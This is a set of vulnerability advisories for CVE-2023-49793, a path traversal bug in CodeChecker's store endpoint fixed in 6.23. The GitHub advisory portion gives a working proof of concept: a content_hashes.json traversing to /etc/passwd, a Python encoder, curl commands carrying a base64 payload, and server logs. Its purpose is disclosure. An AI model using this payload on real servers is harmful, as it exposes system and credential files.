pysec-2024-54
Vulnerability from pysec
Published
2024-06-24 18:15
Modified
2024-06-26 19:19
Severity
Details
CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. Zip files uploaded to the server endpoint of CodeChecker store are not properly sanitized. An attacker, using a path traversal attack, can load and display files on the machine of CodeChecker server. The vulnerable endpoint is /Default/v6.53/CodeCheckerService@massStoreRun. The path traversal vulnerability allows reading data on the machine of the CodeChecker server, with the same permission level as the CodeChecker server.
The attack requires a user account on the CodeChecker server, with permission to store to a server, and view the stored report. This vulnerability has been patched in version 6.23.
Aliases
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "codechecker",
"purl": "pkg:pypi/codechecker"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "46bada41e32f3ba0f6011d5c556b579f6dddf07a"
}
],
"repo": "https://github.com/Ericsson/codechecker",
"type": "GIT"
},
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.23.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"6.16.0",
"6.16.0a1",
"6.17.0",
"6.18.0",
"6.18.1",
"6.18.2",
"6.19.0",
"6.19.1",
"6.20.0",
"6.20.0rc1",
"6.21.0",
"6.21.0rc1",
"6.22.0",
"6.22.0rc1",
"6.22.1",
"6.22.2",
"6.22.2.post1",
"6.23.0rc2"
]
}
],
"aliases": [
"CVE-2023-49793",
"GHSA-h26w-r4m5-8rrf"
],
"details": "CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. Zip files uploaded to the server endpoint of `CodeChecker store` are not properly sanitized. An attacker, using a path traversal attack, can load and display files on the machine of `CodeChecker server`. The vulnerable endpoint is `/Default/v6.53/CodeCheckerService@massStoreRun`. The path traversal vulnerability allows reading data on the machine of the `CodeChecker server`, with the same permission level as the `CodeChecker server`.\nThe attack requires a user account on the `CodeChecker server`, with permission to store to a server, and view the stored report. This vulnerability has been patched in version 6.23.",
"id": "PYSEC-2024-54",
"modified": "2024-06-26T19:19:24.981233+00:00",
"published": "2024-06-24T18:15:00+00:00",
"references": [
{
"type": "EVIDENCE",
"url": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf"
},
{
"type": "ADVISORY",
"url": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf"
},
{
"type": "FIX",
"url": "https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
cve-2023-49793
Vulnerability from cvelistv5
Published
2024-06-24 17:36
Modified
2024-08-02 22:01
Severity
Summary
Path traversal in `CodeChecker server` in the endpoint of `CodeChecker store`
References
| URL | Tags |
|---|---|
| https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf | x_refsource_CONFIRM |
| https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a | x_refsource_MISC |
Impacted products
| Vendor | Product |
|---|---|
| Ericsson | codechecker |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:ericsson:codechecker:6.23:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "codechecker",
"vendor": "ericsson",
"versions": [
{
"lessThan": "6.23",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-49793",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-25T14:37:31.808705Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T14:42:52.007Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:01:26.011Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf"
},
{
"name": "https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "codechecker",
"vendor": "Ericsson",
"versions": [
{
"status": "affected",
"version": "\u003c 6.23.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. Zip files uploaded to the server endpoint of `CodeChecker store` are not properly sanitized. An attacker, using a path traversal attack, can load and display files on the machine of `CodeChecker server`. The vulnerable endpoint is `/Default/v6.53/CodeCheckerService@massStoreRun`. The path traversal vulnerability allows reading data on the machine of the `CodeChecker server`, with the same permission level as the `CodeChecker server`.\nThe attack requires a user account on the `CodeChecker server`, with permission to store to a server, and view the stored report. This vulnerability has been patched in version 6.23."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-24T17:36:21.827Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf"
},
{
"name": "https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a"
}
],
"source": {
"advisory": "GHSA-h26w-r4m5-8rrf",
"discovery": "UNKNOWN"
},
"title": "Path traversal in `CodeChecker server` in the endpoint of `CodeChecker store`"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49793",
"datePublished": "2024-06-24T17:36:21.827Z",
"dateReserved": "2023-11-30T13:39:50.863Z",
"dateUpdated": "2024-08-02T22:01:26.011Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
ghsa-h26w-r4m5-8rrf
Vulnerability from github
Published
2024-06-24 16:18
Modified
2024-06-26 21:56
Severity
Summary
CodeChecker has a Path traversal in `CodeChecker server` in the endpoint of `CodeChecker store`
Details
Summary
ZIP files uploaded to the server-side endpoint handling a CodeChecker store are not properly sanitized. An attacker can exercise a path traversal to make the CodeChecker server load and display files from an arbitrary location on the server machine.
Details
Target
The vulnerable endpoint is /<PRODUCT_URL>/v6.53/CodeCheckerService@massStoreRun.
Exploit overview
The attack is made possible by improper sanitization at one point in the process.
- When the ZIP file is uploaded by
CodeChecker store, it is first unzipped to a temporary directory (safely). - When deciding which files to insert into CodeChecker's internal database, the decision is made based on the
content_hashes.jsonin the ZIP. An attacker has control over the contents of this file. - After reading that file, the paths specified in the JSON are normalized by this code: https://github.com/Ericsson/codechecker/blob/fa41e4e5d9566b5a4f5a80a27bddec73a5146f5a/web/server/codechecker_server/api/mass_store_run.py#L442-L444
- Providing sufficiently many
../../s inside thecontent_hashes.json, an attacker can control the insertion of completely arbitrary files into CodeChecker's internal database. - This is confirmed in the log output:
mass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd - Once the file is inserted into the internal database, it can be displayed trivially on the Web interface.
As CodeChecker doesn't distinguish between filenames after the ZIP is extraced, an attacker can define aliases in
content_hashes.json.mass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd mass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored. - The file is displayed in the Web UI if and only if there is at least one bug report in it.
The bug reports are coming from the ZIP and the attacker can craft the required contents for this.
If done so, the logs confirm the requirement for presenting the results of the exploit will be triggered:
hash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2 - The server emits the contents of the injected files from the server's database to all users:
[!NOTE]
The file is shown with the contents as it was on the system when the exploitedCodeChecker storewas exercised. This attack does not allow the server to return the "live" contents of a file on the server's storage — the attacker(s) must recurringly exercise the exploit to keep the injected files "updated" in the database.
PoC
The minimal example that can trigger the exploit can be downloaded: PoC.zip.
The key to the exploit is the content_hashes.json file. The additional files create a report in the loaded /etc/passwd file, so it is displayed in the web UI.
/content_hashes.json
```json {"/../../../../../../../../../../../../../../../etc/passwd": "malformed_hash", "/etc/passwd": "malformed_hash"} ```Uploading the ZIP to the server
The communication between the CodeChecker store and the server is done by transmitting the ZIP file in a Base64-encoded string.
Encoding the ZIP into the format of the API can be done with Python:
```py import base64 import zlib
with open("PoC.zip", "rb") as f: contents = f.read() encoded = base64.b64encode(zlib.compress(contents)) print(encoded) ```
The result of the compression and encoding can be sent to the running server over the API. When the API is called, the exploit is exercised.
bash
curl "<SERVER_URL>/<PRODUCT_URL>/v6.53/CodeCheckerService" \
--data \
'[1,"massStoreRun",1,0,{"1":{"str":"poc"},"3":{"str":"6.22.1"},"4":{"str":"<ENCODED_ZIP>"},"5":{"tf":0}}]'
One-line PoC
```bash curl "http://localhost:8001/Default/v6.53/CodeCheckerService" \ --data \ '[1,"massStoreRun",1,0,{"1":{"str":"poc"},"3":{"str":"6.22.1"},"4" {"str":"eJzNVk9vIzUUT3cpS4MqIcEB2Msw6oGV2vmXzKRZZVPYdpGqLSXSdrXqVquRM+NJhk7GI9tpN5Qe0SJx4MARCfEB+AaIE2glrnAAwY0DXwAQ4gT2ZCbj+ZNI2ROTWLaff+/5+edn+/XuXn2uXuOfi48frP7zh49Ym5eXWXFQSGFI7SEgQ0iU9wkKL2RVUZb4Q+qoESDk3JVvSvIIBB7CI+jGJuVNSV4MuOwx/16J/fvQP35QE74XWMEwQpgSNUMhnEfdEFCg5WoeMFxLc7Vtz2u0XVNvt0yrrbcA8JqN2MyUjK+YGeutk78fXqnVeLGWMTOCFLiAgilf63WJffIZxMRHIVujsZmIKEIBYYKTaZ9/F1kzhoRgBDktDnKhM4TOKcTyZgEDHMoM2+F4xJCN4qiDRiMQcm5PHhXHMp9kSzEMRZfe3Aag3296Ld2Ebrule6bnsbXp/WZjGxrA0TRNt6DeNG+U3DhH+NQPB7brY+hQhCfcrFqCoTGNxtSOAB1WAzAk44DaBI2xA23PDyDnqEBMjCRgFAVQiQKf0NiWEEp5+GWJsxAEkw/Y8rnp0ig59aMIcs604hD1R5BQNvE8p/pw4HNGdau9bTTaTaOpaJap66axWYGG8c4IWNPSrEazWXA/6ybNR+v1yyxa77Fo/WtlfPuja7UaL+Yy0Sqy2Nl5PAqkJCxuybqiyRIMWfCxjb0l3z96Z2tb3unWO2/svbd7dNy7I8VaUu/+7YP9XUneUtW3I2ZMVfeO9qTewf69I4nZUNU7h7IkDymNbqrq+fm5AjhKYaHJgez4YhRBTCcHzNgWU1Bc6spsmqn1nDtM6voO7dbXOqdw0nV9MAgRob5DOioXMDnAGPDGWopcm2IdQOGAxWUKZGJCMVtZ9wANfEeCGCPcURNZpsaPnc0PYlnRQRgqe/6Z78KHEKOysguJg/2IH9Cydo+dAYliwBcIgrKyT8gYxvegnV7EyLMDP4S2H05Fj2nZbMNtsE3vW6ahGc0WBF5ba+ltYDbclq41oFGeKECMm7yLM+oSElCQDa51fDb1AOKuzoyl7QzMz2wVWqsC8+VUgQuWO2p+M/n9Ibg72/Oc6+keRCJ2gUNTPLvF3Bw8oQuesR3IkTeXvrwXVRQuIrGaxkV+V1I5n8wcnYkyu9YIGMCqhS+I00QZg3AASU5X2JFiL0/OHHpEgsrrnUfRQpLm0bSIqAJVy/ve/P/43lHFbcj1xOOVyWfSTDZzveq+TQJDeIeFYCnYSJOkmZnUgXg0fZ9nay3c5XOu44DFIQFihGYLi/UGMISYvQOu3Z8sZ3uXZWC70wysfIEmT1RZa5pWVTqUNrI6fu669d7dlSs7tXlJ+UaS2EpJXZGi15PBldqrtU++6LQOr/2ycvr0z095/evn13/cY/V0knmZdTrJS6x8KSQTouWfn7weW/qe/Pvtu6xO+6LlcjYuWn66TJoiTj0xvV2+mB9+I8eHpannZfAic+srz5rPi358Ix98zOdP69c2rpf8KOdmoh9fX33GTE104+LJ7xt8+rT+7qeUjtXnOWaV/fYZBZ+9yHv/Ac5gmHc="},"5":{"tf":0}}]' ```Full server logs for the store processing
``` [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - server.py:342 do_POST() - 127.0.0.1:33352 -- [Anonymous] POST /Default/v6.53/CodeCheckerService@massStoreRun [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:61 __enter__() - [poc] Unzip storage file... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:82 unzip() - Unzipping mass storage ZIP '/tmp/tmpenegwbxj.zip' to '/home/discookie/.codechecker/tmpx7hg1teb'... [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:64 __exit__() - [poc] Unzip storage file done... (duration: 0.0 sec) [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1298 store() - Using unzipped folder '/home/discookie/.codechecker/tmpx7hg1teb' [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:61 __enter__() - [poc] Store source files... [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1310 store() - [poc] Storing 2 source file(s). [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:463 __store_source_files() - 17 fileid found [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:64 __exit__() - [poc] Store source files done... (duration: 0.01 sec) [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1363 store() - Storing into run 'poc' locked at '2023-10-25 14:30:31.615536'. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:686 __add_or_update_run() - Adding run 'poc'... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:730 __add_or_update_run() - Adding run history. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:755 __add_or_update_run() - Adding run done. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:761 __add_or_update_run() - Storing analysis statistics done. [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:61 __enter__() - [poc] Store reports... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1163 __store_reports() - Get reports from '/home/discookie/.codechecker/tmpx7hg1teb/reports' directory [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1163 __store_reports() - Get reports from '/home/discookie/.codechecker/tmpx7hg1teb/reports/a7d0fa2d60d08ff39d519756917aaf43' directory [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1175 __store_reports() - Parsing input file 'sample.plist' [DEBUG][2023-10-25 14:30:31] {report-converter} [2043] <139754026274816> - hash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2 [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:987 __process_report_file() - Storing report to the database... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:827 __add_report_context() - Storing bug path positions. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:834 __add_report_context() - Storing bug path events. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:842 __add_report_context() - Storing notes. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:853 __add_report_context() - Storing macro expansions. [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1220 __store_reports() - [poc] Processed 1 analyzer result file(s). [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:64 __exit__() - [poc] Store reports done... (duration: 0.1 sec) [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1260 finish_checker_run() - Finishing checker run [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1397 store() - 'Anonymous' stored results (3 KB /decompressed/) to run 'poc' (id: 16) in 0.15 seconds. [INFO][2023-10-25 14:30:31] {store_time} [2043] <139754026274816> - mass_store_run.py:1414 store() - 2023-10-25T14:30:31.612326, 0.15s, "Default", "poc", 3KB, 1, 16 [DEBUG][2023-10-25 14:30:31] {profiler} [2043] <139754026274816> - profiler.py:59 debug_wrapper() - [0.173351s] massStoreRun ```Impact
The path traversal vulnerability allows reading data on the machine of the CodeChecker server, with the same permission level as the CodeChecker server process. This allows for the exfiltration from the server-side storage medium.
If the CodeChecker server is run with authentication enabled (not the default configuration), then the attack requires a valid user account on the CodeChecker server, with the permission to store to a database, and view the stored reports.
CVSS 3.1 Base Score: 6.5 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Reproducible up to version 6.22.1.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "codechecker"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.23.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-49793"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2024-06-24T16:18:09Z",
"nvd_published_at": "2024-06-24T18:15:10Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nZIP files uploaded to the server-side endpoint handling a `CodeChecker store` are not properly sanitized. An attacker can exercise a path traversal to make the `CodeChecker server` load and display files from an arbitrary location on the server machine.\n\n## Details\n\n### Target\n\nThe vulnerable endpoint is `/\u003cPRODUCT_URL\u003e/v6.53/CodeCheckerService@massStoreRun`.\n\n### Exploit overview\n\nThe attack is made possible by improper sanitization at one point in the process.\n\n1. When the ZIP file is uploaded by `CodeChecker store`, it is first unzipped to a temporary directory (safely).\n2. When deciding which files to insert into CodeChecker\u0027s internal database, the decision is made based on the `content_hashes.json` in the ZIP. An attacker has control over the contents of this file.\n3. After reading that file, the paths specified in the JSON are normalized by this code:\nhttps://github.com/Ericsson/codechecker/blob/fa41e4e5d9566b5a4f5a80a27bddec73a5146f5a/web/server/codechecker_server/api/mass_store_run.py#L442-L444\n4. Providing sufficiently many `../../`s inside the `content_hashes.json`, an attacker can control the insertion of completely arbitrary files into CodeChecker\u0027s internal database.\n5. This is confirmed in the log output:\n```\nmass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd\n```\n6. Once the file is inserted into the internal database, it can be displayed trivially on the Web interface.\nAs CodeChecker doesn\u0027t distinguish between filenames after the ZIP is extraced, an attacker can define aliases in `content_hashes.json`.\n```\nmass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd\nmass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored.\n```\n7. The file is displayed in the Web UI if and only if there is at least one _bug report_ in it.\nThe bug reports are coming from the ZIP and the attacker can craft the required contents for this.\nIf done so, the logs confirm the requirement for presenting the results of the exploit will be triggered:\n```\nhash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2\n```\n8. The server emits the contents of the injected files from the server\u0027s database to all users:\n\n\n\u003e [!NOTE] \n\u003e The file is shown with the contents as it was on the system when the exploited `CodeChecker store` was exercised. This attack does not allow the server to return the \"live\" contents of a file on the server\u0027s storage \u0026mdash; the attacker(s) must recurringly exercise the exploit to keep the injected files \"updated\" in the database.\n\n\n## PoC\n\nThe minimal example that can trigger the exploit can be downloaded: [`PoC.zip`](https://github.com/Ericsson/codechecker/files/14757143/PoC.zip).\n\nThe key to the exploit is the `content_hashes.json` file. The additional files create a report in the loaded `/etc/passwd` file, so it is displayed in the web UI.\n\n\u003cdetails\u003e\u003csummary\u003e\u003ctt\u003e/content_hashes.json\u003c/tt\u003e\u003c/summary\u003e\n\n```json\n{\"/../../../../../../../../../../../../../../../etc/passwd\": \"malformed_hash\", \"/etc/passwd\": \"malformed_hash\"}\n```\n\u003c/details\u003e\n\n#### Uploading the ZIP to the server\n\nThe communication between the `CodeChecker store` and the server is done by transmitting the ZIP file in a Base64-encoded string. \nEncoding the ZIP into the format of the API can be done with Python:\n\n```py\nimport base64\nimport zlib\n\nwith open(\"PoC.zip\", \"rb\") as f:\n contents = f.read()\nencoded = base64.b64encode(zlib.compress(contents))\nprint(encoded)\n```\n\nThe result of the compression and encoding can be sent to the running server over the API.\nWhen the API is called, the exploit is exercised.\n\n```bash\ncurl \"\u003cSERVER_URL\u003e/\u003cPRODUCT_URL\u003e/v6.53/CodeCheckerService\" \\\n --data \\\n \u0027[1,\"massStoreRun\",1,0,{\"1\":{\"str\":\"poc\"},\"3\":{\"str\":\"6.22.1\"},\"4\":{\"str\":\"\u003cENCODED_ZIP\u003e\"},\"5\":{\"tf\":0}}]\u0027\n```\n\n\u003cdetails\u003e\u003csummary\u003eOne-line PoC\u003c/summary\u003e\n\n```bash\ncurl \"http://localhost:8001/Default/v6.53/CodeCheckerService\" \\\n --data \\\n \u0027[1,\"massStoreRun\",1,0,{\"1\":{\"str\":\"poc\"},\"3\":{\"str\":\"6.22.1\"},\"4\" {\"str\":\"eJzNVk9vIzUUT3cpS4MqIcEB2Msw6oGV2vmXzKRZZVPYdpGqLSXSdrXqVquRM+NJhk7GI9tpN5Qe0SJx4MARCfEB+AaIE2glrnAAwY0DXwAQ4gT2ZCbj+ZNI2ROTWLaff+/5+edn+/XuXn2uXuOfi48frP7zh49Ym5eXWXFQSGFI7SEgQ0iU9wkKL2RVUZb4Q+qoESDk3JVvSvIIBB7CI+jGJuVNSV4MuOwx/16J/fvQP35QE74XWMEwQpgSNUMhnEfdEFCg5WoeMFxLc7Vtz2u0XVNvt0yrrbcA8JqN2MyUjK+YGeutk78fXqnVeLGWMTOCFLiAgilf63WJffIZxMRHIVujsZmIKEIBYYKTaZ9/F1kzhoRgBDktDnKhM4TOKcTyZgEDHMoM2+F4xJCN4qiDRiMQcm5PHhXHMp9kSzEMRZfe3Aag3296Ld2Ebrule6bnsbXp/WZjGxrA0TRNt6DeNG+U3DhH+NQPB7brY+hQhCfcrFqCoTGNxtSOAB1WAzAk44DaBI2xA23PDyDnqEBMjCRgFAVQiQKf0NiWEEp5+GWJsxAEkw/Y8rnp0ig59aMIcs604hD1R5BQNvE8p/pw4HNGdau9bTTaTaOpaJap66axWYGG8c4IWNPSrEazWXA/6ybNR+v1yyxa77Fo/WtlfPuja7UaL+Yy0Sqy2Nl5PAqkJCxuybqiyRIMWfCxjb0l3z96Z2tb3unWO2/svbd7dNy7I8VaUu/+7YP9XUneUtW3I2ZMVfeO9qTewf69I4nZUNU7h7IkDymNbqrq+fm5AjhKYaHJgez4YhRBTCcHzNgWU1Bc6spsmqn1nDtM6voO7dbXOqdw0nV9MAgRob5DOioXMDnAGPDGWopcm2IdQOGAxWUKZGJCMVtZ9wANfEeCGCPcURNZpsaPnc0PYlnRQRgqe/6Z78KHEKOysguJg/2IH9Cydo+dAYliwBcIgrKyT8gYxvegnV7EyLMDP4S2H05Fj2nZbMNtsE3vW6ahGc0WBF5ba+ltYDbclq41oFGeKECMm7yLM+oSElCQDa51fDb1AOKuzoyl7QzMz2wVWqsC8+VUgQuWO2p+M/n9Ibg72/Oc6+keRCJ2gUNTPLvF3Bw8oQuesR3IkTeXvrwXVRQuIrGaxkV+V1I5n8wcnYkyu9YIGMCqhS+I00QZg3AASU5X2JFiL0/OHHpEgsrrnUfRQpLm0bSIqAJVy/ve/P/43lHFbcj1xOOVyWfSTDZzveq+TQJDeIeFYCnYSJOkmZnUgXg0fZ9nay3c5XOu44DFIQFihGYLi/UGMISYvQOu3Z8sZ3uXZWC70wysfIEmT1RZa5pWVTqUNrI6fu669d7dlSs7tXlJ+UaS2EpJXZGi15PBldqrtU++6LQOr/2ycvr0z095/evn13/cY/V0knmZdTrJS6x8KSQTouWfn7weW/qe/Pvtu6xO+6LlcjYuWn66TJoiTj0xvV2+mB9+I8eHpannZfAic+srz5rPi358Ix98zOdP69c2rpf8KOdmoh9fX33GTE104+LJ7xt8+rT+7qeUjtXnOWaV/fYZBZ+9yHv/Ac5gmHc=\"},\"5\":{\"tf\":0}}]\u0027 \n```\n\u003c/details\u003e\n\n\u003cdetails\u003e\u003csummary\u003eFull server logs for the \u003ctt\u003estore\u003c/tt\u003e processing\u003c/summary\u003e\n\n```\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - server.py:342 do_POST() - 127.0.0.1:33352 -- [Anonymous] POST /Default/v6.53/CodeCheckerService@massStoreRun\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:61 __enter__() - [poc] Unzip storage file...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:82 unzip() - Unzipping mass storage ZIP \u0027/tmp/tmpenegwbxj.zip\u0027 to \u0027/home/discookie/.codechecker/tmpx7hg1teb\u0027...\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:64 __exit__() - [poc] Unzip storage file done... (duration: 0.0 sec)\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1298 store() - Using unzipped folder \u0027/home/discookie/.codechecker/tmpx7hg1teb\u0027\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:61 __enter__() - [poc] Store source files...\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1310 store() - [poc] Storing 2 source file(s).\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:463 __store_source_files() - 17 fileid found\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:64 __exit__() - [poc] Store source files done... (duration: 0.01 sec)\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1363 store() - Storing into run \u0027poc\u0027 locked at \u00272023-10-25 14:30:31.615536\u0027.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:686 __add_or_update_run() - Adding run \u0027poc\u0027...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:730 __add_or_update_run() - Adding run history.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:755 __add_or_update_run() - Adding run done.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:761 __add_or_update_run() - Storing analysis statistics done.\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:61 __enter__() - [poc] Store reports...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1163 __store_reports() - Get reports from \u0027/home/discookie/.codechecker/tmpx7hg1teb/reports\u0027 directory\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1163 __store_reports() - Get reports from 